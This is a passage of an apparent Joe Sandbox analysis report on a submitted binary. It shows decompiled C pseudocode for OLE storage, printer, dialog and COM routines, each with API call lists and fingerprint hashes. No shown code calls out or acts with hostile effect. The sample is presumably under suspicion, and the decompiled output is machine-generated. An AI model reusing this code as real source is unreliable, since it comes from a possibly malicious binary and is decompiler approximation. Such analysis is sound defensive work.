                                                      					_t175 =  *((intOrPtr*)( *_t174 + 0xc))(_t174, _t221 + 0xc8);
                                                      					 *(_t224 - 0x10) = _t175;
                                                      					if(_t175 < 0) {
                                                      						goto L44;
                                                      					}
                                                      					goto L5;
                                                      				}
                                                      				_t122 = E00412F6B(_t114, __ecx,  *(_t224 + 8), 0, 3, 0x439390, _t219,  *((intOrPtr*)(_t224 + 0x14)));
                                                      				 *(_t224 - 0x10) = _t122;
                                                      				if(_t122 < 0) {
                                                      					goto L52;
                                                      				}
                                                      				goto L2;
                                                      			}

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 004148B3
                                                        • Part of subcall function 00412F6B: SysStringLen.OLEAUT32(?), ref: 00412F73
                                                        • Part of subcall function 00412F6B: CoGetClassObject.OLE32(?,?,00000000,004393D0,?), ref: 00412F91
                                                      • CreateILockBytesOnHGlobal.OLE32(00000000,00000001,?), ref: 00414A3D
                                                      • StgCreateDocfileOnILockBytes.OLE32(?,00001012,00000000,?), ref: 00414A5E
                                                      • GlobalAlloc.KERNEL32(00000000,00000000), ref: 00414AAB
                                                      • GlobalLock.KERNEL32 ref: 00414AB9
                                                      • GlobalUnlock.KERNEL32(?), ref: 00414AD1
                                                      • CreateILockBytesOnHGlobal.OLE32(8007000E,00000001,?), ref: 00414AF4
                                                      • StgOpenStorageOnILockBytes.OLE32(?,00000000,00000012,00000000,00000000,?), ref: 00414B10
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: GlobalLock$Bytes$Create$AllocClassDocfileH_prolog3ObjectOpenStorageStringUnlock
                                                      • String ID:
                                                      • API String ID: 317715441-0
                                                      • Opcode ID: f13fa0fecad93a40aca0f4cab5c0fbf99db1ea20b7f5c39c287bbb21db593fda
                                                      • Instruction ID: 234c5863126d79d24c7a543b411d71e2f8900e6cec6980265dfd09f5a00c5f11
                                                      • Opcode Fuzzy Hash: f13fa0fecad93a40aca0f4cab5c0fbf99db1ea20b7f5c39c287bbb21db593fda
                                                      • Instruction Fuzzy Hash: 09C1ECB090020A9FCB10DFA5C884AEEB7B9FF88345B10456EF515EB290D775ED91CB54
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      APIs
                                                      • SetLastError.KERNEL32(0000007F), ref: 022414DB
                                                      • SetLastError.KERNEL32(0000007F), ref: 02241507
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.347463465.0000000002241000.00000020.00000001.sdmp, Offset: 02241000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_2241000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast
                                                      • String ID:
                                                      • API String ID: 1452528299-0
                                                      • Opcode ID: 910afc3a4fa0c3823aae2e6240d5d7e233e154d6bbfede580f827b6d6b506028
                                                      • Instruction ID: 986d1d374019eb9c5ec28467a33215461aa0deee2d64904f13a08be87eb7a90f
                                                      • Opcode Fuzzy Hash: 910afc3a4fa0c3823aae2e6240d5d7e233e154d6bbfede580f827b6d6b506028
                                                      • Instruction Fuzzy Hash: D571D774E20109EFDB08DF98D585AADB7B2FF48304F248598D41AAB345DB74EA91CF90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 93%
                                                      			E00403DEB(void* __ecx, char* _a4) {
                                                      				void* _v8;
                                                      				void* _t15;
                                                      				void* _t20;
                                                      				void* _t35;
                                                      
                                                      				_push(__ecx);
                                                      				_t35 = __ecx;
                                                      				_t15 =  *(__ecx + 0x74);
                                                      				if(_t15 != 0) {
                                                      					_t15 = lstrcmpA(( *(GlobalLock(_t15) + 2) & 0x0000ffff) + _t16, _a4);
                                                      					if(_t15 == 0) {
                                                      						_t15 = OpenPrinterA(_a4,  &_v8, 0);
                                                      						if(_t15 != 0) {
                                                      							_t18 =  *(_t35 + 0x70);
                                                      							if( *(_t35 + 0x70) != 0) {
                                                      								E0040F775(_t18);
                                                      							}
                                                      							_t20 = GlobalAlloc(0x42, DocumentPropertiesA(0, _v8, _a4, 0, 0, 0));
                                                      							 *(_t35 + 0x70) = _t20;
                                                      							if(DocumentPropertiesA(0, _v8, _a4, GlobalLock(_t20), 0, 2) != 1) {
                                                      								E0040F775( *(_t35 + 0x70));
                                                      								 *(_t35 + 0x70) = 0;
                                                      							}
                                                      							_t15 = ClosePrinter(_v8);
                                                      						}
                                                      					}
                                                      				}
                                                      				return _t15;
                                                      			}








                                                      APIs
                                                      • GlobalLock.KERNEL32 ref: 00403E08
                                                      • lstrcmpA.KERNEL32(?,?), ref: 00403E14
                                                      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 00403E26
                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00403E46
                                                      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 00403E4E
                                                      • GlobalLock.KERNEL32 ref: 00403E58
                                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 00403E65
                                                      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 00403E7D
                                                        • Part of subcall function 0040F775: GlobalFlags.KERNEL32(?), ref: 0040F780
                                                        • Part of subcall function 0040F775: GlobalUnlock.KERNEL32(?,?,?,00403BCA,?,00000004,004011AF), ref: 0040F792
                                                        • Part of subcall function 0040F775: GlobalFree.KERNEL32 ref: 0040F79D
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: Global$DocumentLockProperties$AllocCloseFlagsFreeOpenPrinterPrinter.Unlocklstrcmp
                                                      • String ID:
                                                      • API String ID: 168474834-0
                                                      • Opcode ID: deb0bda6af114da4f7ded021d2b5c250483e039ecf8471d16094a6eb54607884
                                                      • Instruction ID: ac421361bb6fd67369ebe5b5881472c41486625af2fb4b5e452b01b71c6537f7
                                                      • Opcode Fuzzy Hash: deb0bda6af114da4f7ded021d2b5c250483e039ecf8471d16094a6eb54607884
                                                      • Instruction Fuzzy Hash: 52119171500604BBDB216FB6DC49DAF7AACFB88744B00056EFA05E2561D779DA00D768
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 62%
                                                      			E00407270(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				void* __ebp;
                                                      				signed int _t133;
                                                      				intOrPtr* _t140;
                                                      				int _t145;
                                                      				signed short _t148;
                                                      				short* _t149;
                                                      				intOrPtr _t152;
                                                      				signed short _t177;
                                                      				intOrPtr _t178;
                                                      				signed int _t179;
                                                      				intOrPtr _t184;
                                                      				struct tagRECT _t189;
                                                      				int _t190;
                                                      				void* _t191;
                                                      				signed short _t193;
                                                      				signed short _t194;
                                                      				void* _t195;
                                                      				void* _t221;
                                                      				intOrPtr _t225;
                                                      				short _t226;
                                                      				intOrPtr* _t233;
                                                      				void* _t234;
                                                      				signed short* _t236;
                                                      				signed int _t240;
                                                      				void* _t241;
                                                      				signed short* _t242;
                                                      				signed short* _t244;
                                                      				signed short* _t245;
                                                      				signed int _t246;
                                                      				void* _t248;
                                                      
                                                      				_t246 = _t248 - 0x44;
                                                      				_t133 =  *0x443590; // 0xa920217c
                                                      				 *(_t246 + 0x48) = _t133 ^ _t246;
                                                      				_push(0x50);
                                                      				E0041F6EA(E00431F26, __ebx, __edi, __esi);
                                                      				_t233 =  *((intOrPtr*)(_t246 + 0x60));
                                                      				_t236 =  *(_t246 + 0x68);
                                                      				 *((intOrPtr*)(_t246 + 0x1c)) =  *((intOrPtr*)(_t246 + 0x54));
                                                      				 *(_t246 + 8) =  *(_t246 + 0x58);
                                                      				 *((intOrPtr*)(_t246 + 0x14)) =  *((intOrPtr*)(_t246 + 0x70));
                                                      				_t140 = _t233 + 0x12;
                                                      				 *((intOrPtr*)(_t246 + 0x2c)) = _t140;
                                                      				if( *((intOrPtr*)(_t246 + 0x5c)) != 0) {
                                                      					 *((intOrPtr*)(_t246 - 0x20)) =  *((intOrPtr*)(_t233 + 8));
                                                      					 *((intOrPtr*)(_t246 - 0x1c)) =  *((intOrPtr*)(_t233 + 4));
                                                      					 *((short*)(_t246 - 0x18)) =  *((intOrPtr*)(_t233 + 0xc));
                                                      					 *((short*)(_t246 - 0x16)) =  *((intOrPtr*)(_t233 + 0xe));
                                                      					 *((short*)(_t246 - 0x12)) =  *_t140;
                                                      					_t225 = _t233 + 0x18;
                                                      					 *((short*)(_t246 - 0x14)) =  *(_t233 + 0x10);
                                                      					 *((short*)(_t246 - 0x10)) =  *((intOrPtr*)(_t233 + 0x14));
                                                      					_t233 = _t246 - 0x20;
                                                      					 *((intOrPtr*)(_t246 + 0x2c)) = _t225;
                                                      				}
                                                      				_t226 =  *((short*)(_t233 + 0xa));
                                                      				_t189 =  *((short*)(_t233 + 8));
                                                      				 *((intOrPtr*)(_t246 - 0x24)) =  *((short*)(_t233 + 0xe)) + _t226;
                                                      				 *(_t246 - 0x30) = _t189;
                                                      				 *((intOrPtr*)(_t246 - 0x2c)) = _t226;
                                                      				 *((intOrPtr*)(_t246 - 0x28)) =  *((short*)(_t233 + 0xc)) + _t189;
                                                      				_t145 = MapDialogRect( *( *((intOrPtr*)(_t246 + 0x1c)) + 0x20), _t246 - 0x30);
                                                      				 *(_t246 + 0x24) =  *(_t246 + 0x24) & 0x00000000;
                                                      				if( *((intOrPtr*)(_t246 + 0x6c)) >= 4) {
                                                      					_t194 =  *_t236;
                                                      					 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - 4;
                                                      					_t236 =  &(_t236[2]);
                                                      					if(_t194 > 0) {
                                                      						__imp__#4(_t236, _t194);
                                                      						_t195 = _t194 + _t194;
                                                      						_t236 = _t236 + _t195;
                                                      						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t195;
                                                      						 *(_t246 + 0x24) = _t145;
                                                      					}
                                                      				}
                                                      				 *(_t246 + 0x20) =  *(_t246 + 0x20) & 0x00000000;
                                                      				E0040320E(_t246 + 0x28, E0040EA5E());
                                                      				 *((intOrPtr*)(_t246 - 4)) = 0;
                                                      				 *(_t246 + 0xc) = 0;
                                                      				 *(_t246 + 0x10) = 0;
                                                      				 *(_t246 + 0x18) = 0;
                                                      				if( *((short*)(_t246 + 0x64)) == 0x37a ||  *((short*)(_t246 + 0x64)) == 0x37b) {
                                                      					_t148 =  *_t236;
                                                      					_t57 = _t148 - 0xc; // -12
                                                      					_t226 = _t57;
                                                      					_t236 =  &(_t236[6]);
                                                      					 *_t246 = _t148;
                                                      					 *((intOrPtr*)(_t246 + 0x30)) = _t226;
                                                      					if(_t226 <= 0) {
                                                      						L16:
                                                      						 *((intOrPtr*)(_t246 + 0x6c)) =  *((intOrPtr*)(_t246 + 0x6c)) - _t148;
                                                      						 *((intOrPtr*)(_t246 + 0x64)) =  *((intOrPtr*)(_t246 + 0x64)) + 0xfffc;
                                                      						goto L17;
                                                      					} else {
                                                      						goto L8;
                                                      					}
                                                      					do {
                                                      						L8:
                                                      						_t177 =  *_t236;
                                                      						 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) - 6;
                                                      						_t242 =  &(_t236[2]);
                                                      						_t193 =  *_t242 & 0x0000ffff;
                                                      						_t236 =  &(_t242[1]);
                                                      						 *(_t246 + 4) = _t177;
                                                      						if(_t177 != 0x80010001) {
                                                      							_t178 = E00402EE1(__eflags, 0x1c);
                                                      							 *((intOrPtr*)(_t246 - 0x34)) = _t178;
                                                      							__eflags = _t178;
                                                      							 *((char*)(_t246 - 4)) = 1;
                                                      							if(_t178 == 0) {
                                                      								_t179 = 0;
                                                      								__eflags = 0;
                                                      							} else {
                                                      								_t179 = E00413E1A(_t178,  *(_t246 + 0x20),  *(_t246 + 4), _t193);
                                                      							}
                                                      							 *((char*)(_t246 - 4)) = 0;
                                                      							 *(_t246 + 0x20) = _t179;
                                                      						} else {
                                                      							_t244 =  &(_t236[2]);
                                                      							 *(_t246 + 0x10) =  *_t236;
                                                      							_t245 =  &(_t244[6]);
                                                      							 *(_t246 + 0x18) =  *_t244;
                                                      							E00403507(_t246 + 0x28, _t245);
                                                      							_t184 =  *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x28)) - 0xc));
                                                      							_t221 = 0xffffffef;
                                                      							 *((intOrPtr*)(_t246 + 0x30)) =  *((intOrPtr*)(_t246 + 0x30)) + _t221 - _t184;
                                                      							_t236 = _t245 + _t184 + 1;
                                                      							 *(_t246 + 0xc) = _t193 & 0x0000ffff;
                                                      						}
                                                      					} while ( *((intOrPtr*)(_t246 + 0x30)) > 0);
                                                      					_t148 =  *_t246;
                                                      					goto L16;
                                                      				} else {
                                                      					L17:
                                                      					_t149 =  *((intOrPtr*)(_t246 + 0x2c));
                                                      					_t263 =  *_t149 - 0x7b;
                                                      					_push(_t246 + 0x38);
                                                      					_push(_t149);
                                                      					if( *_t149 != 0x7b) {
                                                      						__imp__CLSIDFromProgID();
                                                      					} else {
                                                      						__imp__CLSIDFromString();
                                                      					}
                                                      					_t190 = 0;
                                                      					_push(0);
                                                      					_push( *((intOrPtr*)(_t246 + 0x6c)));
                                                      					_push(_t236);
                                                      					 *((intOrPtr*)(_t246 + 0x2c)) = _t149;
                                                      					E004199DF(0, _t246 - 0x5c, _t233, _t236, _t263);
                                                      					 *((char*)(_t246 - 4)) = 2;
                                                      					 *((intOrPtr*)(_t246 + 0x34)) = 0;
                                                      					asm("sbb esi, esi");
                                                      					_t240 =  ~( *((intOrPtr*)(_t246 + 0x64)) - 0x378) & _t246 - 0x0000005c;
                                                      					_t264 =  *((intOrPtr*)(_t246 + 0x2c));
                                                      					if( *((intOrPtr*)(_t246 + 0x2c)) >= 0) {
                                                      						_push(1);
                                                      						if(E00411CB5(0,  *((intOrPtr*)(_t246 + 0x1c)), _t233, _t240, _t264) != 0 && E00412252( *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x1c)) + 0x4c)), 0, _t246 + 0x38, 0,  *_t233, _t246 - 0x30,  *(_t233 + 0x10) & 0x0000ffff, _t240, 0 |  *((short*)(_t246 + 0x64)) == 0x00000377,  *(_t246 + 0x24), _t246 + 0x34) != 0) {
                                                      							E0041343B( *((intOrPtr*)(_t246 + 0x34)), 1);
                                                      							SetWindowPos( *( *((intOrPtr*)(_t246 + 0x34)) + 0x24),  *(_t246 + 8), 0, 0, 0, 0, 0x13);
                                                      							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x94) =  *(_t246 + 0x20);
                                                      							E004071CF( *((intOrPtr*)(_t246 + 0x34)) + 0xa4, _t246, _t246 + 0x28);
                                                      							 *((short*)( *((intOrPtr*)(_t246 + 0x34)) + 0x98)) =  *(_t246 + 0xc);
                                                      							 *( *((intOrPtr*)(_t246 + 0x34)) + 0x9c) =  *(_t246 + 0x10);
                                                      							 *( *((intOrPtr*)(_t246 + 0x34)) + 0xa0) =  *(_t246 + 0x18);
                                                      						}
                                                      					}
                                                      					if( *(_t246 + 0x24) != _t190) {
                                                      						__imp__#6( *(_t246 + 0x24));
                                                      					}
                                                      					_t152 =  *((intOrPtr*)(_t246 + 0x34));
                                                      					if(_t152 == _t190) {
                                                      						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) = _t190;
                                                      					} else {
                                                      						 *((intOrPtr*)( *((intOrPtr*)(_t246 + 0x14)))) =  *((intOrPtr*)(_t152 + 0x24));
                                                      						_t190 = 1;
                                                      					}
                                                      					 *((char*)(_t246 - 4)) = 0;
                                                      					E00419D41(_t190, _t246 - 0x5c, _t226, _t233, _t240, 1);
                                                      					E00403036( *((intOrPtr*)(_t246 + 0x28)) + 0xfffffff0, _t226);
                                                      					 *[fs:0x0] =  *((intOrPtr*)(_t246 - 0xc));
                                                      					_pop(_t234);
                                                      					_pop(_t241);
                                                      					_pop(_t191);
                                                      					return E0041E5DF(_t190, _t191,  *(_t246 + 0x48) ^ _t246, _t226, _t234, _t241);
                                                      				}
                                                      			}


































                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00407289
                                                      • MapDialogRect.USER32(?,00000000), ref: 0040731A
                                                      • SysAllocStringLen.OLEAUT32(?,?), ref: 00407339
                                                      • CLSIDFromString.OLE32(?,?,00000000), ref: 0040742B
                                                        • Part of subcall function 00402EE1: _malloc.LIBCMT ref: 00402EFB
                                                      • CLSIDFromProgID.OLE32(?,?,00000000), ref: 00407433
                                                      • SetWindowPos.USER32(?,00000001,00000000,00000000,00000000,00000000,00000013,00000001,00000000,?,00000000,?,00000000,00000000,0000FC84,00000000), ref: 004074CD
                                                      • SysFreeString.OLEAUT32(00000000), ref: 0040751F
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: String$From$AllocDialogFreeH_prolog3ProgRectWindow_malloc
                                                      • String ID:
                                                      • API String ID: 2841959276-0
                                                      • Opcode ID: 1308482831191b4023c7861a20e543ac11ade589bc15574cbf101fd2d2cc8799
                                                      • Instruction ID: 448c8c2dcd699e09b9d85336ea3713344f7c4e017cbfbbdeab4c9df7cebc7252
                                                      • Opcode Fuzzy Hash: 1308482831191b4023c7861a20e543ac11ade589bc15574cbf101fd2d2cc8799
                                                      • Instruction Fuzzy Hash: FBB10671904209AFDB04DF69C984AEE7BB4FF08318F00452AFC19A7391E778E994CB95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 37%
                                                      			E00418A33(signed int __eax) {
                                                      
                                                      				asm("lds ebp, [ecx+ecx*8-0x3e]");
                                                      				 *__eax =  *__eax | __eax;
                                                      			}



                                                      0x00418a33
                                                      0x00418a37

                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 00418A40
                                                      • _memset.LIBCMT ref: 00418AAC
                                                        • Part of subcall function 0041A7E4: _memset.LIBCMT ref: 0041A7EC
                                                      • VariantClear.OLEAUT32(?), ref: 00418AEC
                                                      • SysFreeString.OLEAUT32(00000000), ref: 00418B6D
                                                      • SysFreeString.OLEAUT32(00000000), ref: 00418B7C
                                                      • SysFreeString.OLEAUT32(00000000), ref: 00418B8B
                                                      • VariantClear.OLEAUT32(00000000), ref: 00418BA0
                                                        • Part of subcall function 0041A7C4: VariantCopy.OLEAUT32(?,?), ref: 0041A7D2
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: FreeStringVariant$Clear_memset$CopyH_prolog3
                                                      • String ID:
                                                      • API String ID: 883085156-0
                                                      • Opcode ID: 18a5db97fe09296ebc22d1f71aec940bc2ead0d2ae3222a38423bdfbdea22666
                                                      • Instruction ID: e5905b9386fbc3a182e4f73bdb5b86b4c3549b20c445dd11c0baad671bbe4cf2
                                                      • Opcode Fuzzy Hash: 18a5db97fe09296ebc22d1f71aec940bc2ead0d2ae3222a38423bdfbdea22666
                                                      • Instruction Fuzzy Hash: 90511DB1900209DFDB10CFA4C885BDEB7B4FF48304F14456EE515E7291DB78A985CB68
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 53%
                                                      			E004157D0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                      				signed int _t59;
                                                      				signed int _t63;
                                                      				signed int _t64;
                                                      				signed int _t69;
                                                      				signed int _t70;
                                                      				signed int _t71;
                                                      				void* _t81;
                                                      				intOrPtr* _t82;
                                                      				void* _t97;
                                                      				signed int _t98;
                                                      				void* _t101;
                                                      				void* _t102;
                                                      				void* _t103;
                                                      
                                                      				_t103 = __eflags;
                                                      				_push(0x60);
                                                      				E0041F6EA(E00432F66, __ebx, __edi, __esi);
                                                      				_t97 =  *(_t101 + 8) + 0xffffff28;
                                                      				E0040DBE0(_t101 - 0x18, _t103,  *((intOrPtr*)( *(_t101 + 8) - 0xbc)));
                                                      				 *(_t101 - 4) = 0;
                                                      				if( *((intOrPtr*)(_t97 + 0x88)) != 0) {
                                                      					L19:
                                                      					 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                      					__eflags =  *(_t101 - 0x14);
                                                      					if( *(_t101 - 0x14) != 0) {
                                                      						_push( *((intOrPtr*)(_t101 - 0x18)));
                                                      						_push(0);
                                                      						E0040D3B7();
                                                      					}
                                                      					_t59 = 0;
                                                      					__eflags = 0;
                                                      					L22:
                                                      					return E0041F7C2(_t59);
                                                      				}
                                                      				if( *((intOrPtr*)(_t97 + 0x90)) != 0) {
                                                      					L6:
                                                      					__eflags =  *((intOrPtr*)(_t97 + 0x9c)) -  *(_t101 + 0xc);
                                                      					if( *((intOrPtr*)(_t97 + 0x9c)) !=  *(_t101 + 0xc)) {
                                                      						goto L19;
                                                      					}
                                                      					_t81 = _t97 + 0xac;
                                                      					__imp__#9(_t81);
                                                      					_t63 =  *(_t97 + 0x50);
                                                      					__eflags = _t63;
                                                      					_t85 = 0 | __eflags != 0x00000000;
                                                      					 *(_t101 + 8) = 0;
                                                      					__eflags = __eflags != 0;
                                                      					if(__eflags != 0) {
                                                      						L9:
                                                      						_t64 =  *((intOrPtr*)( *_t63))(_t63, 0x4393c0, _t101 + 8);
                                                      						__eflags = _t64;
                                                      						if(_t64 < 0) {
                                                      							goto L19;
                                                      						}
                                                      						E0041F330(_t97, _t101 - 0x48, 0, 0x20);
                                                      						E0041F330(_t97, _t101 - 0x28, 0, 0x10);
                                                      						_t69 =  *(_t101 + 8);
                                                      						_t102 = _t102 + 0x18;
                                                      						__eflags = _t69;
                                                      						_t85 = 0 | __eflags != 0x00000000;
                                                      						__eflags = __eflags != 0;
                                                      						if(__eflags == 0) {
                                                      							goto L8;
                                                      						}
                                                      						_t70 =  *((intOrPtr*)( *_t69 + 0x18))(_t69,  *(_t101 + 0xc), 0x439340, 0, 2, _t101 - 0x28, _t81, _t101 - 0x48, _t101 - 0x10);
                                                      						__eflags =  *(_t101 - 0x44);
                                                      						_t82 = __imp__#6;
                                                      						 *(_t101 + 0xc) = _t70;
                                                      						if( *(_t101 - 0x44) != 0) {
                                                      							 *_t82( *(_t101 - 0x44));
                                                      						}
                                                      						__eflags =  *(_t101 - 0x40);
                                                      						if( *(_t101 - 0x40) != 0) {
                                                      							 *_t82( *(_t101 - 0x40));
                                                      						}
                                                      						__eflags =  *(_t101 - 0x3c);
                                                      						if( *(_t101 - 0x3c) != 0) {
                                                      							 *_t82( *(_t101 - 0x3c));
                                                      						}
                                                      						_t71 =  *(_t101 + 8);
                                                      						 *((intOrPtr*)( *_t71 + 8))(_t71);
                                                      						__eflags =  *(_t101 + 0xc);
                                                      						if( *(_t101 + 0xc) >= 0) {
                                                      							 *((intOrPtr*)(_t97 + 0xa8)) = 1;
                                                      						}
                                                      						goto L19;
                                                      					}
                                                      					L8:
                                                      					_t63 = E004037E3(_t81, _t85, _t97, 0, __eflags);
                                                      					goto L9;
                                                      				}
                                                      				 *(_t101 - 0x68) =  *(_t101 + 0xc);
                                                      				 *((intOrPtr*)(_t101 - 0x6c)) = 2;
                                                      				 *((intOrPtr*)(_t101 - 0x64)) = 0;
                                                      				 *((intOrPtr*)(_t101 - 0x60)) = 0;
                                                      				 *((intOrPtr*)(_t101 - 0x5c)) = 0;
                                                      				 *((intOrPtr*)(_t101 - 0x54)) = 0;
                                                      				 *((intOrPtr*)(_t101 - 0x50)) = 0;
                                                      				 *((intOrPtr*)(_t101 - 0x4c)) = 0;
                                                      				E00413514(_t97, _t101 - 0x6c);
                                                      				if( *((intOrPtr*)(_t101 - 0x54)) == 0) {
                                                      					goto L6;
                                                      				}
                                                      				 *(_t101 - 4) =  *(_t101 - 4) | 0xffffffff;
                                                      				_t98 =  *((intOrPtr*)(_t101 - 0x54));
                                                      				if( *(_t101 - 0x14) != 0) {
                                                      					_push( *((intOrPtr*)(_t101 - 0x18)));
                                                      					_push(0);
                                                      					E0040D3B7();
                                                      				}
                                                      				_t59 = _t98;
                                                      				goto L22;
                                                      			}

















                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000001.00000002.346937725.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                      • Associated: 00000001.00000002.346929060.0000000000400000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346973829.0000000000434000.00000002.00020000.sdmp
                                                      • Associated: 00000001.00000002.346984088.0000000000442000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346990313.0000000000446000.00000004.00020000.sdmp
                                                      • Associated: 00000001.00000002.346994903.0000000000449000.00000002.00020000.sdmp
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_1_2_400000_NWMEaRqF7s.jbxd
                                                      Similarity
                                                      • API ID: FreeString$_memset$ClearH_prolog3Variant
                                                      • String ID:
                                                      • API String ID: 3574576181-0
                                                      • Opcode ID: b84e5eaf672f1bfb1190bcd0de862ae4c3f2647a4bdaa930b90debcdc623c7f8
                                                      • Instruction ID: ea0c79ff68116504239c338cd84909263c11110d6238371cb65e95f2b4ede0f1
                                                      • Opcode Fuzzy Hash: b84e5eaf672f1bfb1190bcd0de862ae4c3f2647a4bdaa930b90debcdc623c7f8
                                                      • Instruction Fuzzy Hash: BA4148B1E10619EFCF11DFA4C845ADEBB79BF48B24F10811BF015AA290C7789A91CF95
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      C-Code - Quality: 68%
                                                      			E00405591(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags, signed int _a264, char _a268) {
                                                      				char _v4;
                                                      				intOrPtr _v12;
                                                      				char* _v16;
                                                      				void* _v20;
                                                      				char* _v24;
                                                      				char _v28;
                                                      				long _v32;
                                                      				char _v36;
                                                      				char _v272;
                                                      				char _v280;
                                                      				intOrPtr _v292;
                                                      				void* __ebp;
                                                      				signed int _t40;
                                                      				char _t44;
                                                      				void* _t47;
                                                      				void* _t54;
                                                      				char* _t61;
                                                      				void* _t77;
                                                      				void* _t80;
                                                      				void* _t81;
                                                      				intOrPtr _t94;
                                                      				void* _t98;
                                                      				void* _t100;
                                                      				void* _t101;
                                                      				char* _t104;
                                                      
                                                      				_t95 = __edx;
                                                      				_t81 = __ecx;
                                                      				_t79 = __ebx;
                                                      				_t104 =  &_v272;
                                                      				_t40 =  *0x443590; // 0xa920217c
                                                      				_a264 = _t40 ^ _t104;
                                                      				_push(0x18);
                                                      				E0041F6EA(E00431D73, __ebx, __edi, __esi);
                                                      				_t100 = __ecx;
                                                      				_v20 = 0;
                                                      				_v32 = 0;
                                                      				_t44 = E004052F2(__ecx, __edx);
                                                      				_v28 = _t44;
                                                      				if(_t44 != 0) {
                                                      					do {
                                                      						__eax =  &_v28;
                                                      						_push(__eax);
                                                      						__ecx = __esi;
                                                      						E00405303();
                                                      						__eflags = __eax - __edi;
                                                      						if(__eax != __edi) {
                                                      							__edx =  *__eax;
                                                      							__ecx = __eax;
                                                      							__eax =  *((intOrPtr*)(__edx + 0xc))(__edi, 0xfffffffc, __edi, __edi);
                                                      						}
                                                      						__eflags = _v28 - __edi;
                                                      					} while (_v28 != __edi);
                                                      				}
                                                      				__eflags =  *(_t100 + 0x54);
                                                      				if( *(_t100 + 0x54) == 0) {
